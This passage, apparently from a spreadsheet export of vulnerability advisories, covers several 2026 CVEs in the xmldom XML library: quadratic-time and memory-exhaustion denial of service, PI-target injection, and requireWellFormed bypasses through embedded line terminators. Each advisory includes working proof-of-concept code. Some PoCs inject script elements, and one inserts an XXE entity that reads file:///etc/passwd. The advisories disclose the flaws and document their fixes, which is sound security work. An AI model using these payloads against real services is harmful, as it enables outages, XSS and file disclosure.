O(K²); the O(K²) surface is exactly those two `normalize()` callers. Consequently a parser-side bound
alone cannot remediate Finding B — the fix must live in `normalize()`.

## Affected Versions

Both findings are present across the full published `@xmldom/xmldom` history — both
currently-maintained versions (`0.8.x` and `0.9.x`) are affected — and across the retired unscoped
`xmldom` line. Finding B's `normalize()` merge is additionally reachable **programmatically**: a
direct `normalize()` call on a DOM built with adjacent text nodes hits the same O(K²) merge,
independent of the parser — so, unlike Finding A, it does not require the malformed-input recovery
path.

## Proof of Concept

Default `DOMParser`, no options. The input is trivially compressible (`a&lt;` / `a&lt;&gt;` repeated) and
never throws — it is parsed via the recovery path.

```js
const { DOMParser } = require('@xmldom/xmldom');

// Silence the expected `error`-level recovery reports (default handler logs
// them to console.error without throwing; only fatalError throws).
console.error = function () {};

function timeParse(label, xml, mime) {
  const t0 = process.hrtime.bigint();
  new DOMParser().parseFromString(xml, mime); // completes; no exception
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log(label + '  bytes=' + Buffer.byteLength(xml) + '  time=' + ms.toFixed(1) + ' ms');
}

for (const N of [4000, 8000, 16000, 32000]) {
  // Finding A: long re-scans, O(n^2) during parse.
  timeParse('A N=' + N, '&lt;r&gt;' + 'a&lt;'.repeat(N) + '&lt;/r&gt;', 'text/xml');
  // Finding B: short re-scans (cheap parse) but K adjacent text nodes -&gt; O(K^2) in normalize().
  timeParse('B N=' + N, '&lt;r&gt;' + 'a&lt;&gt;'.repeat(N) + '&lt;/r&gt;', 'text/html');
  // Combined: ONE input hits both A and B under the default parser.
  timeParse('C N=' + N, '&lt;r&gt;' + 'a&lt;'.repeat(N) + '&lt;/r&gt;', 'text/xml');
}
```

Measured on Node v18.20.8 (absolute ms vary by host; the load-bearing fact is that doubling the
input ~quadruples the time — canonical O(n²)):

Finding A, isolated (`"&lt;r&gt;" + "a&lt;"×N + "&lt;/r&gt;"`, normalize disabled to isolate the re-scan):

| N | input bytes | `@xmldom/xmldom` 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 2000 | 4007 | 43 ms | 37 ms |
| 4000 | 8007 | 129 ms | 106 ms |
| 8000 | 16007 | 434 ms | 424 ms |
| 16000 | 32007 | 1629 ms | 1611 ms |

Finding B, isolated (`"&lt;r&gt;" + "a&lt;&gt;"×N + "&lt;/r&gt;"`, time attributable to `normalize()`):

| K (N) | input bytes | 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 4000 | 12007 | 120 ms | 165 ms |
| 8000 | 24007 | 589 ms | 771 ms |
| 16000 | 48007 | 3142 ms | 4448 ms |
| 32000 | 96007 | 12127 ms | 12951 ms |

Combined (default parser, both findings; `"&lt;r&gt;" + "a&lt;"×N + "&lt;/r&gt;"`):

| N | input bytes | 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 4000 | 8007 | 341 ms | 397 ms |
| 8000 | 16007 | 1894 ms | 1641 ms |
| 16000 | 32007 | 4398 ms | 7661 ms |

~32 KB of input → several seconds of single-threaded event-loop stall.

### Finding B via the public `normalize()` API (no parser)

```js
const { DOMImplementation } = require('@xmldom/xmldom');

function timeNormalize(K) {
  const doc = new DOMImplementation().createDocument(null, 'r', null);
  const el = doc.documentElement;
  for (let i = 0; i &lt; K; i++) el.appendChild(doc.createTextNode('x')); // K adjacent text nodes
  const t0 = process.hrtime.bigint();
  doc.normalize();                                    // O(K^2) merge — no parsing involved
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log('K=' + K + '  time=' + ms.toFixed(1) + ' ms');
}
for (const K of [2000, 4000, 8000, 16000, 32000]) timeNormalize(K);
```

Measured on Node v18.20.8 (doubling K ~quadruples the time — O(K²)):

| K | 0.9.10 | 0.8.13 |
|--:|--:|--:|
| 2000 | 5.7 ms | 5.6 ms |
| 32000 | 1263 ms | 1704 ms |

This path is reachable by any application that builds a DOM from attacker-influenced data and calls
`normalize()`, entirely independent of `DOMParser`.

## Impact

Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic work (multiple seconds at tens of KB; larger inputs scale as O(n²)). No
memory blow-up beyond transient strings, no data exposure, no integrity impact. Because XML is
routinely accepted from untrusted sources and parsed with default options, one request can stall a
server. The payloads are highly compressible, so any endpoint accepting compressed XML faces
additional amplification. Finding B is additionally reachable via an explicit `normalize()` call on a
programmatically built DOM (see Proof of Concept), so applications that construct a document from attacker-influenced
data and normalize it are exposed even without parsing.

## Severity note

The complexity is **quadratic**, not exponential, so a multi-second stall requires
tens-to-hundreds of KB of input. `VA:H` reflects that xmldom applies **no** input-size limit and the
path runs on default-options parsing, so a single unbounded parse can fully stall the event loop.

## Fix Applied

Two independent, non-breaking fixes shipped together — each alone leaves the other's quadratic cost dominating the default parse.
Finding A — terminate the malformed tag-name scan at an embedded `&lt;`, so error recovery is linear instead of O(n²). DOM output is unchanged; only the reported error-message text differs (error strings are not a semver contract).
Finding B — merge adjacent text nodes in `normalize()` in O(K) instead of O(K²), which also closes the same slowdown reachable programmatically through a direct `normalize()` call. Both ship on both maintained versions.</t></is></c><c r="T56" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83614</t></is></c></row><row r="57"><c r="A57" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B57" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C57" s="5" t="inlineStr"><is><t>CVE-2026-83615</t></is></c><c r="D57" s="5" t="inlineStr" /><c r="E57" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F57" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G57" s="5" t="inlineStr" /><c r="H57" s="5" t="n"><v>0.004</v></c><c r="I57" s="5" t="inlineStr" /><c r="J57" s="5" t="inlineStr" /><c r="K57" s="5" t="inlineStr" /><c r="L57" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M57" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N57" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O57" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P57" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q57" s="5" t="inlineStr" /><c r="R57" s="5" t="inlineStr" /><c r="S57" s="5" t="inlineStr"><is><t>## Summary

When an element declares a namespace prefix, xmldom copies the entire in-scope namespace map
into a fresh object and keeps that copy on the element while it is open on the parse stack. A
crafted document that nests N elements, each declaring one unique prefix, therefore drives the
parser to hold on the order of N(N+1)/2 = **O(N²) namespace-map entries at its peak**, so a small,
highly compressible input exhausts the heap. Parsing runs under default options on untrusted,
network-delivered XML, so a sub-megabyte payload can OOM-crash the process before any
application-level validation runs — an unauthenticated denial of service.

## Details

`appendElement` performs the copy: `_copy` clones the current namespace map into a fresh object for
each prefix-declaring element, and the copy is retained on that element's parse-stack entry:

```js
if (localNSMap == null) {
    localNSMap = Object.create(null);
    _copy(currentNSMap, (currentNSMap = Object.create(null)));   // full copy of all ancestor prefixes
}
currentNSMap[nsPrefix] = localNSMap[nsPrefix] = value;
...
el.currentNSMap = currentNSMap;   // retained while the element is open on the parse stack
```

https://github.com/xmldom/xmldom/blob/08a22d78e4bc50f12ce9f5090b8d96ee6031ac7b/lib/sax.js#L467-L540

The copies stack: the element at depth `i` copies a map of size ~`i`, and every ancestor stays live
on the parse stack until it closes, so at the deepest point Σ`i` namespace entries are held at once.
That peak is transient — the completed DOM retains only O(N), one small namespace map per node — but
it is reached during parsing, which is what OOM-crashes the process.

## Proof of Concept

A minimal document — N nested elements, each declaring one unique namespace prefix (no SAML wrapper
needed):

```js
const { DOMParser } = require('@xmldom/xmldom');

function build(n) {
  let open = '', close = '';
  for (let i = 0; i &lt; n; i++) { open += `&lt;a xmlns:p${i}="urn:${i}"&gt;`; close = '&lt;/a&gt;' + close; }
  return `&lt;r&gt;${open}${close}&lt;/r&gt;`;   // &lt;r&gt;&lt;a xmlns:p0="urn:0"&gt;...&lt;a xmlns:p{n-1}="urn:{n-1}"&gt;...&lt;/a&gt;...&lt;/r&gt;
}

for (const n of [2000, 4000, 8000, 16000]) {
  const src = build(n);
  new DOMParser().parseFromString(src, 'text/xml');   // peak memory ~ O(n^2)
  console.log(n, (src.length / 1024).toFixed(0) + ' KB in', (process.resourceUsage().maxRSS / 1024).toFixed(0) + ' MB peak RSS');
}
```

Measured on Node.js v24 (peak RSS ~quadruples per doubling of depth; absolute numbers vary by host):

| depth  | input   | peak RSS                        |
| -----: | ------: | ------------------------------- |
|  2,000 |  56 KB  | 266 MB                          |
|  4,000 | 115 KB  | 622 MB                          |
|  8,000 | 232 KB  | 1.9 GB                          |
| 16,000 | ~470 KB | OOM crash (default ~4 GB heap)  |

About 470 KB of trivially-generated, highly-compressible input crashes a default Node.js process;
larger depths scale as O(N²) into the tens of GB, crashing larger hosts (as first measured by the
reporter with a SAML-shaped payload).

## Impact

Unauthenticated denial of service against any service that parses attacker-influenced XML with
xmldom under default options. A single sub-megabyte request drives multi-gigabyte peak memory and
can OOM-crash the process before any application-level validation (e.g. schema checks or a SAML
signature verification) runs. The payload is a plain namespace-nesting document and highly
compressible, so it is effective over compressed transports (e.g. an HTTP-Redirect / DEFLATE
binding, not only POST bindings).

## Severity note

The CVSS 4.0 vector scores availability only (`VC:N/VI:N/VA:H`): the flaw neither discloses nor
alters data, it exhausts the heap. `VA:H` is justified because a single unauthenticated,
network-delivered request (`AV:N/PR:N/UI:N`) of trivial complexity (`AC:L/AT:N`) drives the parser
to multi-gigabyte peak memory and OOM-crashes the process before any application-level logic runs —
a full loss of availability for the affected service.

## Fix Applied

Inherit each element's in-scope namespace map through the prototype chain instead of copying it for every prefix-declaring element, so a deeply namespaced document holds O(N) namespace entries instead of O(N²) at peak. Behavior-preserving: serialized output is byte-identical, only the memory cost drops. Non-breaking and independent of `requireWellFormed`; ships on both maintained versions.</t></is></c><c r="T57" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83615</t></is></c></row><row r="58"><c r="A58" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B58" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C58" s="5" t="inlineStr"><is><t>CVE-2026-83616</t></is></c><c r="D58" s="5" t="inlineStr" /><c r="E58" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F58" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G58" s="5" t="inlineStr" /><c r="H58" s="5" t="n"><v>0.003</v></c><c r="I58" s="5" t="inlineStr" /><c r="J58" s="5" t="inlineStr" /><c r="K58" s="5" t="inlineStr" /><c r="L58" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M58" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N58" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O58" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P58" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q58" s="5" t="inlineStr" /><c r="R58" s="5" t="inlineStr" /><c r="S58" s="5" t="inlineStr"><is><t>## Summary

`Document.createProcessingInstruction()` in `@xmldom/xmldom` performs no validation on the `target` parameter. The `requireWellFormed: true` serializer option validates only for `:` in the target and a case-insensitive `xml` prefix, but does not check for `&gt;` characters. A `&gt;` in the target breaks the processing instruction boundary (`&lt;?...?&gt;`), allowing injection of arbitrary content into the serialized XML output.

## Details

`Document.createProcessingInstruction(target, data)` at `lib/dom.js` around line 2413 accepts any string as the `target` parameter and stores it on the PI node without validation.

During serialization, the `requireWellFormed` code path (around line 3286) performs two checks on PI targets:

1. Rejects targets containing `:` (namespace prefix check)
2. Rejects targets matching `xml` case-insensitively (reserved prefix)

However, it does NOT validate that the target conforms to the XML Name production, and critically does NOT check for `&gt;` characters. Since processing instructions are serialized as `&lt;?target data?&gt;`, a `&gt;` in the target prematurely closes the PI, causing the remaining content to be interpreted as document content by any downstream XML parser.

### Root Cause

1. `createProcessingInstruction()` performs no validation on `target`
2. The serializer's `requireWellFormed` check is incomplete -- it only checks for `:` and `xml`, missing characters that break PI syntax (`&gt;`, `?`, whitespace)
3. The serializer emits the target verbatim: `&lt;?${target} ${data}?&gt;`

## Proof of Concept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const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// Output: &lt;root&gt;&lt;?a&gt; data?&gt;&lt;/root&gt;
//
// The &gt; in the target closes the PI prematurely.
// A downstream XML parser sees:
//   - Processing instruction: &lt;?a?&gt;  (target "a", no data)
//   - Text content: " data?&gt;"
//
// requireWellFormed: true did NOT prevent the injection.
```

### Injecting elements via PI target

```javascript
const pi2 = doc.createProcessingInstruction(
  'a?&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;?b',
  ''
);
doc.documentElement.appendChild(pi2);

const output2 = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output2);
// Output includes:
//   &lt;?a?&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;?b ?&gt;
//
// The injected &lt;script&gt; element is valid XHTML that a browser would execute.
```

## Impact

Applications that create processing instructions with user-controlled target strings and serialize the result are vulnerable to XML injection. This enables:

- **XML structure injection**: Breaking the PI boundary to inject arbitrary elements, text, or additional processing instructions into the output
- **XSS via XHTML**: If the serialized output is served as XHTML or processed by a browser-based XML parser, injected script elements will execute
- **XXE chain**: Injected DOCTYPE declarations or entity references could trigger XXE in downstream XML parsers that consume the output
- **requireWellFormed bypass**: The existing well-formedness checks are incomplete and provide a false sense of security

## Fix Applied

Under `requireWellFormed`, the serializer validates a processing-instruction target as an XML `NCName` (a `Name` with no colon) and rejects a case-insensitive `xml`, throwing `InvalidStateError` when the target is ill-formed — so a `&gt;`, `?`, or whitespace in the target is now refused.\
On 0.9.12 this replaces an earlier check that already rejected a colon or `xml`, so the no-colon rule is preserved.\
0.8.15 had no processing-instruction target check at all, so the whole target validation is new there.\
Non-breaking and opt-in. See the [XML `Name` production](https://www.w3.org/TR/xml/#NT-Name).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```javascript
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();
const doc = impl.createDocument(null, 'root', null);

// PI target containing &gt; breaks the PI boundary
const pi = doc.createProcessingInstruction('a&gt;', 'data');
doc.documentElement.appendChild(pi);

// Default path: emits the ill-formed target verbatim.
console.log(serializer.serializeToString(doc));
// Output: &lt;root&gt;&lt;?a&gt; data?&gt;&lt;/root&gt;

// Opt-in path: the target check now rejects the break-out character.
try {
  serializer.serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name); // InvalidStateError
}
```

### Why the default stays verbatim

W3C DOM Parsing's require-well-formed flag defaults to false, and the browser `XMLSerializer` emits the target verbatim in that default mode. Unconditionally throwing on an ill-formed PI target would diverge from that platform behavior and would be an unjustified breaking change, so the stricter validation is gated behind `{ requireWellFormed: true }`. (See the [W3C XML Name production](https://www.w3.org/TR/xml/#NT-Name) and [XML Processing Instructions](https://www.w3.org/TR/xml/#sec-pi).)

### Residual limitation

The default serialization path still emits the ill-formed target verbatim -- only the opt-in `requireWellFormed` path is protected. Creation-time validation of the `target` in `createProcessingInstruction()` is breaking and is deferred to the next breaking release, tracked at [xmldom/xmldom#1073](https://github.com/xmldom/xmldom/issues/1073).</t></is></c><c r="T58" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83616</t></is></c></row><row r="59"><c r="A59" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B59" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C59" s="5" t="inlineStr"><is><t>CVE-2026-83617</t></is></c><c r="D59" s="5" t="inlineStr" /><c r="E59" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F59" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G59" s="5" t="inlineStr" /><c r="H59" s="5" t="n"><v>0.003</v></c><c r="I59" s="5" t="inlineStr" /><c r="J59" s="5" t="inlineStr" /><c r="K59" s="5" t="inlineStr" /><c r="L59" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M59" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N59" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O59" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P59" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q59" s="5" t="inlineStr" /><c r="R59" s="5" t="inlineStr" /><c r="S59" s="5" t="inlineStr"><is><t>## Summary

An embedded line terminator bypasses the `requireWellFormed` serializer check for element and
attribute names. The check was added to fix GHSA-w2rr-34g9-rvrj and GHSA-4w3w-2rp5-g8jm; a name whose
first line is well-formed slips past it and is serialized verbatim, so the characters after the line
terminator break out of the start/end tag or attribute. Callers who enabled `requireWellFormed`
specifically to neutralize those name-injection issues remain exposed.

## Details

xmldom builds every grammar production through a shared regexp builder that compiles with the `m`
flag. The anchored full-string matcher used for element and attribute names, `QName_exact =
reg('^', QName, '$')`, therefore inherits `m`. When it is applied as `QName_exact.test(name)` against
an already-assembled node name, the `m` flag makes `$` match at an interior line terminator, so the
matcher accepts any value in which **at least one line** is a valid `QName`; the other lines are never
constrained. A payload whose first line is a valid `QName`, followed by a line terminator and breakout
markup, is what yields a working injection.

The serializer emits the accepted name verbatim into element start/end tags and attribute names, so
the bytes after the line terminator break out of the intended syntactic position. The check is
reached whenever a caller serializes, with `requireWellFormed: true`, a node whose name was set
through programmatic DOM construction (`createElement`, `createElementNS`, `createAttribute`,
`createAttributeNS`) with attacker-influenced input.

### Root Cause

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. A full-string validator built on such a production (`.test()`) accepts any string with one
   conforming line, so a line terminator followed by breakout markup passes.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

// Element name carrying an embedded line terminator + breakout markup:
const doc = new DOMImplementation().createDocument(null, 'root', null);
const el = doc.createElement('a\n&gt;&lt;script&gt;alert(1)&lt;/script');
doc.documentElement.appendChild(el);

// Caller opted into well-formed serialization, expecting invalid names to be rejected:
console.log(new XMLSerializer().serializeToString(doc, { requireWellFormed: true }));
// Observed on the affected version: NO throw; the output contains the injected `&gt;&lt;script&gt;…`
// breakout, because the name's first line ("a") satisfies the m-anchored QName check.
// Expected: InvalidStateError (the name is not a valid XML QName).

// Control — a single-line invalid name IS correctly rejected, proving the check is active and
// that only the line terminator defeats it:
const ctrl = new DOMImplementation().createDocument(null, 'root', null);
ctrl.documentElement.appendChild(ctrl.createElement('a b'));
new XMLSerializer().serializeToString(ctrl, { requireWellFormed: true });
// =&gt; throws InvalidStateError: The element name "a b" is not a valid XML QName
```

## Impact

- **Bypass of a previously shipped security mitigation.** Applications that adopted
  `requireWellFormed: true` specifically to neutralize GHSA-w2rr-34g9-rvrj / GHSA-4w3w-2rp5-g8jm
  remain exposed to element/attribute name injection.
- **XML / markup structure injection**, and, where the serialized output is placed into an HTML
  context, downstream XSS.

## Fix Applied

The anchored XML `Name`/`QName` validators used by the `requireWellFormed` serializer no
longer treat interior line terminators as satisfying the anchors, so a name is validated against the
whole string. A name containing a line terminator is rejected with `InvalidStateError`, closing the
bypass for element and attribute names. The default serialization path is unchanged.

&gt; **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain
&gt; vulnerable unless `{ requireWellFormed: true }` is explicitly passed. Applications that
&gt; serialize untrusted DOM content should audit all `serializeToString()` call sites and add it.

### Proof of Concept - fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const doc = new DOMImplementation().createDocument(null, 'root', null);
const el = doc.createElement('a\n&gt;&lt;script&gt;alert(1)&lt;/script');
doc.documentElement.appendChild(el);

// Default path (require-well-formed off) — unchanged, still emits the name verbatim,
// so the `&gt;&lt;script&gt;…` bytes break out of the start tag:
new XMLSerializer().serializeToString(doc);

// Opted-in path — now rejected:
new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
// throws InvalidStateError: The element name "a\n&gt;&lt;script&gt;alert(1)&lt;/script" is not a valid XML QName
```

### Why the default stays verbatim

The W3C DOM Parsing require-well-formed flag defaults to false, and browser `XMLSerializer` emits
names verbatim when it is unset. Throwing unconditionally would be an unjustified breaking change, so
the check stays gated on the caller opting in with `{ requireWellFormed: true }`.

### Residual limitation

The default serialization path (no `requireWellFormed`) still emits names verbatim by design (above).
Names introduced through `createElement` / `setAttribute` are never validated at creation — those APIs
store the name unchecked by design — so the opt-in serializer check remains the only guard on that
path.</t></is></c><c r="T59" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83617</t></is></c></row><row r="60"><c r="A60" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B60" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C60" s="5" t="inlineStr"><is><t>CVE-2026-83618</t></is></c><c r="D60" s="5" t="inlineStr" /><c r="E60" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F60" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G60" s="5" t="inlineStr" /><c r="H60" s="5" t="n"><v>0.003</v></c><c r="I60" s="5" t="inlineStr" /><c r="J60" s="5" t="inlineStr" /><c r="K60" s="5" t="inlineStr" /><c r="L60" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M60" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N60" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O60" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P60" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q60" s="5" t="inlineStr" /><c r="R60" s="5" t="inlineStr" /><c r="S60" s="5" t="inlineStr"><is><t>## Summary

An embedded line terminator bypasses the `requireWellFormed` serializer check for a `DocumentType`'s
publicId and systemId. The check was added to fix GHSA-f6ww-3ggp-fr8h; an id whose first line is a
valid literal slips past it and is emitted verbatim into the `&lt;!DOCTYPE …&gt;` declaration, so the markup
after the line terminator breaks out into the surrounding document. Callers who enabled
`requireWellFormed` to neutralize DocumentType injection remain exposed.

## Details

`publicId` and `systemId` are stored as raw values **including their surrounding quotes**, and the
`PubidLiteral`/`SystemLiteral` productions include those quotes. The serializer validates them with
`g.PubidLiteral_match.test(publicId)` and `g.SystemLiteral_match.test(systemId)`, where both matchers
are `reg('^', …, '$')` and inherit the `m` flag from xmldom's shared regexp builder. Under `m`, `$`
matches at an interior line terminator, so a value such as `"valid pubid"\n"&gt;&lt;!ENTITY …&gt;` satisfies
the matcher on its first line (`"valid pubid"` is a complete `PubidLiteral`) and the whole value —
including the post-newline breakout — is emitted after `PUBLIC`/`SYSTEM`.

### Root Cause

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. A full-string validator built on such a production (`.test()`) accepts any string with one
   conforming line, so a complete, valid literal on the first line passes even though a line terminator
   and breakout markup follow. `PubidChar` excluding `&lt;`/`&gt;` does not prevent it — the breakout is
   appended *after* the literal, not embedded inside it.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.

## Affected Versions

Only `@xmldom/xmldom` 0.9.x is affected. The vulnerable matchers are built by `lib/grammar.js`'s
`m`-flagged `reg()` builder, and the DocType `publicId`/`systemId` `requireWellFormed` check that
consumes them was introduced in 0.9.10 (the GHSA-f6ww-3ggp-fr8h fix); 0.9.10 and 0.9.11 carry it.
`0.8.x` performs the same `requireWellFormed` check with inline, non-`m` regular expressions and is not
affected. The unscoped `xmldom` package has no `grammar.js` and no `requireWellFormed` serializer, so
there is no check to bypass.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();

// publicId: complete literal on line 1, then newline + breakout
const dt = impl.createDocumentType('html', '"valid pubid"\n"&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;', '');
const doc = impl.createDocument(null, 'root', dt);
console.log(new XMLSerializer().serializeToString(doc, { requireWellFormed: true }));
// Observed (no throw):
//   &lt;!DOCTYPE html PUBLIC "valid pubid"
//   "&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;&gt;&lt;root/&gt;
// Expected: InvalidStateError (publicId is not a valid PubidLiteral).
// Control: a single-line invalid publicId ("no-surrounding-quotes&lt;&gt;") DOES throw InvalidStateError,
// confirming the check is active and specifically bypassed by the line terminator.
```

## Impact

- **Bypass of the GHSA-f6ww-3ggp-fr8h mitigation.** Applications that adopted `requireWellFormed:
  true` to neutralize DocumentType injection remain exposed.
- **XML structure injection into the DOCTYPE**, including injected markup / entity declarations after
  the public or system identifier.

## Fix Applied

The anchored `PubidLiteral`/`SystemLiteral` validators used by the `requireWellFormed`
serializer no longer treat an interior line terminator as satisfying the `$` anchor, so a `publicId`
or `systemId` containing any ECMAScript `LineTerminator` (U+000A, U+000D, U+2028, U+2029) is rejected
with `InvalidStateError`. Valid single-line identifiers serialize unchanged, and the default
serialization path is unaffected.

&gt; **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain vulnerable
&gt; unless `{ requireWellFormed: true }` is explicitly passed. Applications that serialize untrusted DOM
&gt; content should audit all `serializeToString()` call sites and add it.

### Proof of Concept - fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const dt = impl.createDocumentType('html', '"valid pubid"\n"&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;', '');
const doc = impl.createDocument(null, 'root', dt);

// Default path (requireWellFormed off) — unchanged, still emits verbatim:
console.log(new XMLSerializer().serializeToString(doc));
//   &lt;!DOCTYPE html PUBLIC "valid pubid"
//   "&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;&gt;&lt;root/&gt;

// Opt-in path — now throws instead of emitting the breakout:
new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
//   InvalidStateError: DocumentType publicId is not a valid PubidLiteral
```

### Why the default stays verbatim

The W3C DOM Parsing "require well-formed" flag defaults to false, and a browser `XMLSerializer` emits
the DOCTYPE verbatim. Unconditionally throwing on a malformed `publicId`/`systemId` would be an
unjustified breaking change to the default path, so the fix tightens only the opt-in
`requireWellFormed` validator, matching browser and spec defaults.

### Residual limitation

The guarantee holds only for callers that pass `{ requireWellFormed: true }`; the default
serialization path still emits `publicId`/`systemId` verbatim. `publicId` and `systemId` are not
validated at creation (`createDocumentType`) or on direct property assignment
(`documentType.publicId = …`) — the WHATWG DOM specification places no well-formedness constraint on
these fields at creation time, so the serializer is the spec-aligned enforcement point.</t></is></c><c r="T60" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83618</t></is></c></row><row r="61"><c r="A61" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B61" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C61" s="5" t="inlineStr"><is><t>CVE-2026-83619</t></is></c><c r="D61" s="5" t="inlineStr" /><c r="E61" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F61" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G61" s="5" t="inlineStr" /><c r="H61" s="5" t="n"><v>0.003</v></c><c r="I61" s="5" t="inlineStr" /><c r="J61" s="5" t="inlineStr" /><c r="K61" s="5" t="inlineStr" /><c r="L61" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M61" s="5" t="inlineStr"><is><t>0.8.15</t></is></c><c r="N61" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O61" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P61" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q61" s="5" t="inlineStr" /><c r="R61" s="5" t="inlineStr" /><c r="S61" s="5" t="inlineStr"><is><t>## Summary

On the `@xmldom/xmldom` **`0.8.x`** line, parsing an XML end tag whose name is followed by a long run
of whitespace and then a non-whitespace character triggers quadratic-time regular-expression
backtracking (ReDoS), so a single small crafted end tag stalls the Node.js event loop. It is reachable
from `DOMParser.parseFromString` under **default options**, unauthenticated, before any validity
check — an availability-only denial of service. The `0.9.x` line is **not** affected.

## Details

`lib/sax.js` (release-0.8.x, commit `e5c1480`) trims trailing whitespace from a captured end-tag name
with an unanchored global regex:

- `lib/sax.js` line 120: https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L120

```js
/[ \t\n\r]+$/g
```

Applied to a string shaped `whitespace-run + one non-whitespace char` (e.g. the content of an end tag
`&lt;/   …   x&gt;`), the engine must, for every starting position, extend `[ws]+` to the end and then fail
the `$` anchor when the trailing non-whitespace char is present — classic O(n²) backtracking in the
length of the whitespace run. The trimmed substring is delimited only by `indexOf('&gt;')`, so the
attacker controls its length directly.

## Proof of Concept

```js
const { DOMParser } = require('@xmldom/xmldom'); // 0.8.x
const n = 64 * 1024;
const payload = '&lt;r&gt;&lt;/' + ' '.repeat(n) + 'x&gt;';
console.time('parse');
new DOMParser().parseFromString(payload, 'text/xml');
console.timeEnd('parse');
```

Measured (Node 18) — time quadruples per doubling of the whitespace run (canonical O(n²)):

| Whitespace run | Isolated regex | End-to-end `parseFromString` (0.8.13) |
|---|---|---|
|  4 KB | 5.6 ms   | 5.7 ms   |
|  8 KB | 22.7 ms  | 22.5 ms  |
| 16 KB | 88.6 ms  | 92 ms    |
